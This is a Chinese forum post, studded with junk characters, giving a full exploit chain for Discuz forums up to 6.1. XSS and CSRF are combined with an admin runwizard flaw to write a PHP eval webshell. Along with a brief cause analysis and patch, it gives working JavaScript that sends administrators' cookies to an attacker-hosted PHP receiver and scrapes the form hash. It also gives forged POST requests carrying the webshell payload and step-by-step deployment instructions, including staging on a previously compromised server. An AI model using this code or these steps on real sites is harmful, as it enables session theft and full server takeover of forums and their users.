Discuz XSS得webshell+ T# I( J' f6 O8 H N; [2 c3 G- l- L4 q
By racle @tian6.com1 y% @: _1 v% \* d
欢迎转帖.但请保留版权信息.
7 w+ x& S3 n) S% J, N, _- @受影响版本 iscuz<=6.1.0,gbk+utf+big5 j3 [; Y. V6 e' K
, @. K6 H2 B. {6 i: ^
新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效.
" E" X( H' X1 l/ {& Q) x: O( p; S& P+ Y% H. v% f _( m
) o4 n1 {6 @6 S, P/ G. S1 x
3天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.ph ... 54794&ptid=8706
* Z& I/ B* o: T5 h) O当时我说一会就弄出来给大家,但是实际上一接触,发现这个漏洞本身需要管理员后台权限,要广泛普遍的利用还是很复杂的,主要是以下几个问题,所以拖到今天才基本完工.; I" s. J4 T5 Y/ a
3 }- c' w6 @: R4 f% ]0 e& n
分析和写EXP的过程中,得到t0by57,Superhei的大力帮助.他们PHP和JS都不错的哦!希望大家看这篇文章时,更注意分析和明白的过程,毕竟XSS是目前WEB安全的最大头戏.各种形式:XSIO,Cross Iframe Trick,crsf等等..
' r9 s# k# i+ q; X* r本帖补充其中一个FLASH XSS应用方法:配合Discuz得shell-Flash XSS
/ ~" ]& x5 T8 g8 @$ d. P
[6 h0 J3 r# v: a
* l N; s- [" }2 I----------------------------------------------------------前言分隔线-----------------------------------------------------------------------------
- g. J+ I- d2 Z& c9 |9 X. s
4 T# Q. N# I: y$ o; {
( V2 J: [' h$ G1 v+ v# q, Gproblem1:漏洞页面runwizard.inc.php数据提交方式为post.需要模拟POST提交.0 [2 c0 j. ?# a( _
) g, Q2 E# P5 n. I* Gproblem2 ISCUZ论坛在数据提交的时候还验证了referer,因此还要伪造一下.php socket和js都可以伪造referer.
4 ^1 Z9 O$ v1 P0 Y l
1 i( ~; {! t/ E' P m5 ]problem3:formhash()函数采用了用户名+密码+XXX的算法得出,程序本身没办法模拟算出来,于是又耗费了我一段时间,最终想到个傻办法,从源代码里读出来.呵呵.这里是参考了superhei的一个旧EXP想出来的." [2 l4 b0 @. r- @/ I2 q2 ^0 L
$ A* H8 N* I: W+ C: {7 z( O) i' _1 E: ?% I
下面,我为大家简单说说这个漏洞的成因和补的办法.这里是有漏洞的文件代码:bbs/admin/runwizard.inc.php,里面有个函数function saverunwizardhistory() {' u0 J/ M9 ~% }, i% C: @
; j* D) E& p0 o4 K( x4 d- y
global $runwizardfile, $runwizardhistory;
; t& L" q5 _1 O2 Q& n* s [9 {
- t5 I) E+ M8 l5 E6 G1 \ $fp = fopen($runwizardfile, 'w');
! ~, z I8 y4 j7 q/ N9 P
1 h( B6 V: P: f0 w0 c fwrite($fp, serialize($runwizardhistory));
6 [7 I5 y4 Y3 ? A g$ _9 q" p
0 C7 Y( ^, V! [. U+ M fclose($fp);
+ U5 M; U5 K! l7 l2 u5 S6 [4 \, J: _' u
}
3 F! d2 M8 m- _复制代码serialize($runwizardhistory)直接就写进$fp里.runwizardhistory是什么呢?是论坛一些基本的配置信息,譬如论坛名.反应在论坛后台,位置是:discuz.com/bbs/admincp.php?action=runwizard&step=2.论坛名称,地址等三项信息都没任何过滤.该三项内容任何一项都可以直接写入一句话,提交,然后保存在缓存:bbs/forumdata/logs/runwizardlog.php里.
) z9 D6 b4 z, X( t: \/ t以下是修补的办法:function saverunwizardhistory() {7 Q4 ?1 d9 O$ j0 X
! p) E% S* D- l# ~ global $runwizardfile, $runwizardhistory;( y- {2 g2 I( M+ L% A4 y, {
" E1 F$ G+ X5 Z% I $fp = fopen($runwizardfile, 'w');
# |. S$ j4 w0 m, f( q
5 u, ~# @, m) W: v6 @1 M $s = '<?php exit;?>';
+ Z/ @/ m/ }) a9 L3 n @5 a3 S9 s
$s .= serialize($runwizardhistory);
5 t' D4 R3 S0 \: D9 h/ |8 o
% n* I, ^4 H, }' z* o, K7 ? fwrite($fp, $s);$ H# Z+ F% O' \0 h) k/ \$ ^
8 f# v3 n F' e6 C% A1 T
fclose($fp);' ~1 j p& U/ m3 }% I2 h# m/ M
% @, S9 `+ J4 O0 L}9 M5 r! y8 k a ?5 Q3 z8 Q/ U e
复制代码加写 '<?php exit;?>';到最前面,退出并且忽略该文件后面所有PHP代码.这么即使里面有一句话,也不能再被执行.+ |' i3 T9 l& r
/ \ {( O. l% q2 R$ m8 c
2 O, n0 F6 S* i0 W! A
; D9 _! z# O! h' t: e4 A. [$ i. r----------------------------------------漏洞的成因和利用方法分隔线-----------------------------------------------------------------------------
+ z; X$ @( k/ {6 d1 K3 Y7 _9 Z7 H
( q" |& l; m1 R9 i6 A7 J G2 V2 l* a- X- u# ~' v. @
以上是该漏洞的成因和利用方法.大家看到这里,估计也认为这是个鸡肋漏洞了吧,首先要有管理员权限,有后台权限,然后才能上WEBSHELL,实话说,有后台权限,拿SHELL的办法也并不止这一个.所以这个洞的价值,看起来就不大了.当然,这个已经被发布的nday不是我本帖要讲的重点.这里我主要是想告诉大家,将XSS,Crsf和本漏洞联合起来的办法.这样该洞价值就大很多了.
4 o6 B7 a2 P) B+ o' v) I Y |# s( R: C
我们的思路是:论坛上有个xss点,Crsf flash(的确有,Discuz! member.php xss bug,Discuz! 数据库错误信息xss bug,Discuz! flash Crsf bug,Discuz! admincp.php xss bug,Discuz![flash] xss bug),管理员点击或浏览后,就执行了我们的JS,带他到外部一个JS中,通过JS获得他的COOKIES,获得他的HASH,然后经过外部一个PHP封装SOCKET以POST的形式提交前面说的动作,如果论坛没有补上该问题(目前没几个论坛补了.当然,天阳已经补了.^^),那么就会产生bbs/forumdata/logs/runwizardlog.php这个WEBSHELL.6 }" S. |0 ], t" U5 J+ P$ S
' `) p! A& |1 u" Y" ], s. k
这篇文章主要不是给大家个EXP,然后让大家拿着到处乱黑的,主要是讲方法,讲思路.因为这里学问不少.
' l5 [* [: }6 S+ h" E; Q
/ a9 i, l4 z. i: y3 w首先我们要看,怎么通过JS,获得管理员COOKIES,然后把COOKIES传递给最终提交的PHP.获得的办法相信大家都知道,但是传递的办法,譬如以图片形式传递,就非常稳定和实用.是实现AJAX本地语言到服务器语言PHP的好办法.JS部分代码:0 B6 B6 Q2 ]2 V+ @" }; p, O
' G( [* d/ {+ I8 _' S
var url="http://目标网站/admincp.php"; , Y/ N5 o& ~0 D
6 ]2 W; o! J# _+ j
/*获得cookies*/
% h8 W' J: Y) F! W/ A; _8 V. H3 }3 _& j, v& d- W
function getURL(s) {+ ~" ]. |+ m, h m/ F
3 m4 i+ i& j1 ?/ i' qvar image = new Image();
: i. c( V2 j$ a# N! @, i
8 k, J! H- s, u9 K5 L4 E3 Iimage.style.width = 0;
4 H2 b* v2 m! w5 J: B. c; W+ N9 Y, J$ \2 W3 ]; m! J% h3 K
image.style.height = 0;% g, j' v8 @' L8 H& E' x9 M/ Y: l3 V
+ v8 G: I& `, l. V I: mimage.src = s;
0 P% Z4 l& r( k$ A" E7 u* p0 z: v
7 c! Q! A7 x4 W4 E5 M% ~5 u}3 R0 K" V7 [. W$ d( U* Z
) ~, c# @8 q) q( W1 e
getURL("我们做好的接收cookies的.php?x="+encodeURIComponent(document.cookie)); //这里就通过image变量传给了php6 Q8 P$ y- T: {3 O
复制代码php以get方式接收过来的变量.$cookies=$_GET['x'];
* ]! [, u" i; }- G5 f% _复制代码同理,hash我也是这么传到PHP里.不过HASH的获得方法也是很有意思的,众所周知,discuz有formhash来保护每个授权访问的唯一性.但是你也可以发现,在论坛页面用户退出的地方,引用了这个hash.我们要做的,就是从页面的源文件里搜索出hash,筛选出来,传递给PHP即可.筛选的办法很多,你有兴趣的话,可以看看我的筛选JS代码(而且这里discuz其实还留了一手,呵呵) / ^6 Z7 M9 }3 s# @
+ r7 R1 ?& o) d* ~& `8 ~0 Q3 I# m/ [: J0 s' ^
获得了cookies和hash以后,我们需要结合完整数据,做一次模拟提交,大家可以看看,这个是我之前写好的AJAX提交方式:var url="http://tian6.com/raclebbs/";
1 \7 R; e, R8 P& `) h3 T1 I. U4 k4 w7 U) F _$ B- x$ j
|. q6 B4 q5 c1 S4 P: l5 g/ p1 B2 t
& X5 J& U) I, e- O% ]/*hash*/
; K% ^1 \8 ~6 c U9 X# O# r" H8 O9 S2 _( k7 J7 \- m$ G
var xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.3.0");
& {. k U, r0 X
+ v B$ q9 H* L+ {, o& O8 ?' {xmlHttpReq.open("GET", url+"admincp.php?action=home", false);
& j; _3 L' y9 \( d. C# ?
( ]% C3 b$ j, r# ~' n& O0 }5 }, YxmlHttpReq.send();+ d; E" ?7 K- j# A( F
3 ?0 K1 u/ y5 H; z. W! rvar resource = xmlHttpReq.responseText;
2 q& l! H; N+ S: w" N/ u6 a& B$ a# E" {
var numero = resource.search(/formhash/);
" H/ G- b4 m. O3 A8 d# t
: l. o, V! }/ j! Yvar formhash=encodeURIComponent(resource.substr(numero+17,8));6 y' H; Q% s6 J$ d! N! N A
& N; d, P8 I: v& v& Q5 x) L- [' Y9 {( m ^
: K) D. q$ C. q
var post="formhash="+formhash+"&anchor=&settingsnew%5Bbbname%5D=1&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5";//构造要携带的数据 ! a2 n9 @# a' F2 S- R9 T
" |+ M/ C4 e5 F L h0 HxmlHttpReq.open(" OST",url+"admincp.php?action=runwizard&step=3",false);//使用POST方法打开一个到服务器的连接,以异步方式通信 - r: a6 T9 p, j; c' P4 ^4 f
7 Z: T% b* g0 [+ ixmlHttpReq.setRequestHeader("Referer", url);; L. Y7 U/ Y* u
+ T7 {: u3 \! h! G5 B% gxmlHttpReq.setrequestheader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");
& p0 p+ f& M2 s/ s3 m
" m7 Q- z3 L1 X% z" axmlHttpReq.setrequestheader("content-length",post.length); 9 ?8 V) o/ Q2 D$ F
1 l6 }5 M; f T# C) q+ L. `xmlHttpReq.setrequestheader("content-type","application/x-www-form-urlencoded");
( R+ i9 L' Q0 z: o6 `. o# P; ] h% y. ^' B+ Z* z
xmlHttpReq.send(post);//发送数据" b1 Z# U& e+ m
复制代码这里HASH我假设正确,这样提交,也无须cookies- m) x9 h4 X& L+ d5 C
% T/ ]. }+ x2 r w再看看以PHP SOCKET形式提交.$sock = fsockopen("$url", 80, $errno, $errstr, 30);
7 |4 @. {, Q r: S/ f# o# c
; |) u0 Y: z0 s @9 k( A0 m' E1 j/ F& mif (!$sock) die("$errstr ($errno)\n");$ s" K; W8 i: X5 @9 h6 |/ u
! c5 m+ ], W: Z0 [5 s2 s
$data = 'formhash='.$hash.'&anchor=&settingsnew%5Bbbname%5D=Discuz&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5';4 H& o+ J" Q. Q" @) t0 G; h
% ]( V; N+ B6 D# t
4 z; C/ t0 P! x6 L* ?( a V
n# V6 n4 k/ A) o+ B
fwrite($sock, " OST http://$url/admincp.php?action=runwizard&step=3 HTTP/1.1\r\n");) y& @4 F+ ?/ z' m9 h) z5 ]
3 {% n7 b( n+ I5 ~: F( f
fwrite($sock, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*\r\n");* `. Q- e, r) \4 [4 T" o' C8 B
8 [% x4 l. Y f1 S- y
fwrite($sock, "Referer: http://$url/admincp.php?action=runwizard&step=2\r\n");; \( S/ P, U( U
$ {8 V+ q1 l0 O' D; ~% L0 Q* a& lfwrite($sock, "Accept-Language: zh-cn\r\n");
" t: Z9 @4 e; k# K# K1 m: J1 ]( j
+ M- l& Z/ S; Hfwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");% D7 c2 V' H2 v1 Q+ w' t6 E
, E- O3 q, J2 M0 q- K
fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");, m$ Z5 S/ I! N2 n
3 Z! v ], z& z( o# R3 ?2 z& Wfwrite($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n");; |5 P- }" O& e5 o5 W. ]
2 c4 h- g$ h5 }3 x$ _fwrite($sock, "Host: $url\r\n");8 Q6 c: T5 w* p8 N g4 T
' u1 V+ M* \3 g) Mfwrite($sock, "Content-Length: ".strlen($data)."\r\n");
& r) d3 l* Z. c/ h! m- w2 |! W4 G2 }+ E' z% K& e4 L1 n! n
fwrite($sock, "Connection: Keep-Alive\r\n");
7 y5 Z0 e. W- w2 R* k
1 ~) g) I- O4 V% b8 u) H" lfwrite($sock, "Cache-Control: no-cache\r\n");
! {, n& o$ Z+ C
D+ g, q. r7 P. pfwrite($sock, "Cookie:".$cookies."\r\n\r\n");
3 Y b- T% ~, c' m+ z n7 ]! w% G( R: S2 ^% g
fwrite($sock, $data);& a0 A' I% N; o9 `, A
9 g8 Q" h2 m6 H5 I M
' M- ~5 N# a/ L; w& a0 M/ w6 [
2 h8 [2 O# D7 V$ A9 i7 q. }$headers = "";
* W5 x; }1 _# p+ o6 L* D
) O" D# K- |" W p% f1 Wwhile ($str = trim(fgets($sock, 4096))): x' V6 L8 ~. \/ C( N+ i. t& Y
4 R, F& O4 V" W6 c# O. U
$headers .= "$str\n";( \" `4 D/ e; c1 i2 Z) J) P
1 d/ C. S/ U! t4 l
echo "\n";' E$ m1 q' G# y4 I) h$ S% S" x
- }3 ^ l& R ` o$body = "";
9 E& y* b" L' h, E, ~% O, Q* l4 W( }
! r) L8 T! T! ]0 M- c- awhile (!feof($sock))
" ~5 N) ` h5 h2 d& ~
! \* f$ P |$ Z $body .= fgets($sock, 4096);
4 O; B+ L. o( |/ _8 ~: k8 K+ R8 m0 s) A2 [/ c7 G4 Y
fclose($sock);/ G6 E: e3 B. D# G5 \0 f
0 N5 R" c- J- B) t, A; y
echo $body;
1 J! j7 u; S1 }4 c' B1 }复制代码整个漏洞XSS应用大致如此,下面附上JS文件,PHP封装好的提交文件.利用文件限制一下,已注册用户才可以下载,刚来也没关系,仔细看看前面的分析,你也差不多能写出来.^^
7 q2 O+ N& @) E: |$ z# v
' r V1 |8 `8 D8 z7 q
- ]* P- r% H( E-------------------------------------------XSS文件分析分隔线-----------------------------------------------------------------------------
8 C; R0 T6 V: ?; X& h/ I1 j
: p$ G5 l5 |9 x& I e# _5 M( s5 E& _6 F
1 HP SOCKET利用方法首先打开racle.js1 l c2 K6 `/ `* c
- S3 h2 X5 X3 P* [% |6 S2 A+ jvar url="http://tian6.com/raclebbs/admincp.php?action=home"; //改成你要XSS攻击的目标,譬如http://www.discuz.com/admincp.php?action=home# w- N& ?4 A0 g+ x5 _2 q
& ?! M0 l/ K: Z5 P1 E# ~. j: g& X+ h) {+ l. T+ [. u' e$ w7 _
% p1 ]8 G4 \5 x/ ^9 [* S# S然后打开racle@tian6.php
: G, t7 h. h" L- X1 g. I) e Z8 m8 X2 R, R( y' f5 B
$url="racle@tian6.com"; //改成你要XSS攻击的目标,譬如www.discuz.com
8 I$ ~+ z3 U1 { d$ {# k: X
) c9 ]& F! y* ]# [2 m) \
3 s# l. j: p) `- f" K
) m( Q$ ]3 ?. J- A如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:2 Z: @3 L" m: a
+ P- M/ F- ?' U) q3 M$ z
getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+17,8))+"&x="+encodeURIComponent(document.cookie));* p7 i) w& l& a( y5 d
1 j7 U5 I5 M( K+ s' m- G7 z" f
为3 C' J0 r6 O- b5 j% @
/ x) J( W, Y, A( @
getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+9,8))+"&x="+encodeURIComponent(document.cookie));
% ?6 Q8 D5 Q8 |复制代码2:JS利用方法打开ajax-racle.js,修改var url="http://tian6.com/raclebbs/";为你要攻击的论坛地址.2 m+ c0 y0 S9 d2 Q! k
4 t: V( n- _* P
" ^1 `- `7 W" Y- f Q
$ c6 K r, G$ j% b3 W o. E% T如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:$ Q: w; L' ?. B/ a6 P: v, Z
) Q$ T" H* N8 G! [) j6 I4 yvar formhash=encodeURIComponent(resource.substr(numero+17,8));
9 y$ K2 s) v0 ^& |0 q/ g. [9 w2 `7 @8 K
为
- B( n0 _8 T6 Z- R: z! |) Y/ ?1 p. d# a
var formhash=encodeURIComponent(resource.substr(numero+9,8));
- ?" T# e; w1 d$ `3 }复制代码ok.以上两种方法则其一.在攻击前,我们应该先看看论坛打上补丁没有,你可以尝试访问:http://target.com/bbs/forumdata/logs/runwizardlog.php,如果一片空白,那就没戏咯.不是空白就会有些论坛信息出现,但也不代表就肯定存在漏洞,因为可能人家补过之后没有更新过论坛信息而已.目前来说,有8成把握吧.7 r- E% z$ p2 ^0 G9 _+ v& e
3 I& D7 V% x2 p0 h- f2 b
如果是第一种方法,就把racle.js,还有racle@tian6.php文件上传到一个可以执行PHP的地方,譬如你以前拿下的WEBSHELL里.两个文件需在同一目录下.记得该空间要支持PHP.然后在论坛以<script src=http://你放好的地方/racle.js></script>构造好XSS点.. C% X5 |5 t1 \7 L/ U. e) s# M
3 l, [" Y8 s( k! n
如果是第二种方法,就把ajax-racle.js,上传到一个你以前拿下的WEBSHELL里,然后在论坛以<script src=http://你放好的地方/ajax-racle.js></script>构造好XSS点.
4 F3 f, e9 f$ c: L0 g& O! J. m% V1 H9 i3 U2 z* Q ^) m. L
不管你用什么方法,等到管理员一点该连接或者浏览一下论坛,他论坛bbs/forumdata/logs/runwizardlog.php里就多了个<?php eval($_POST[racle])?> ^^.赶紧拿控制端连上去吧.3 S n. ~0 U2 X/ a
2 G, e8 |' t, m
|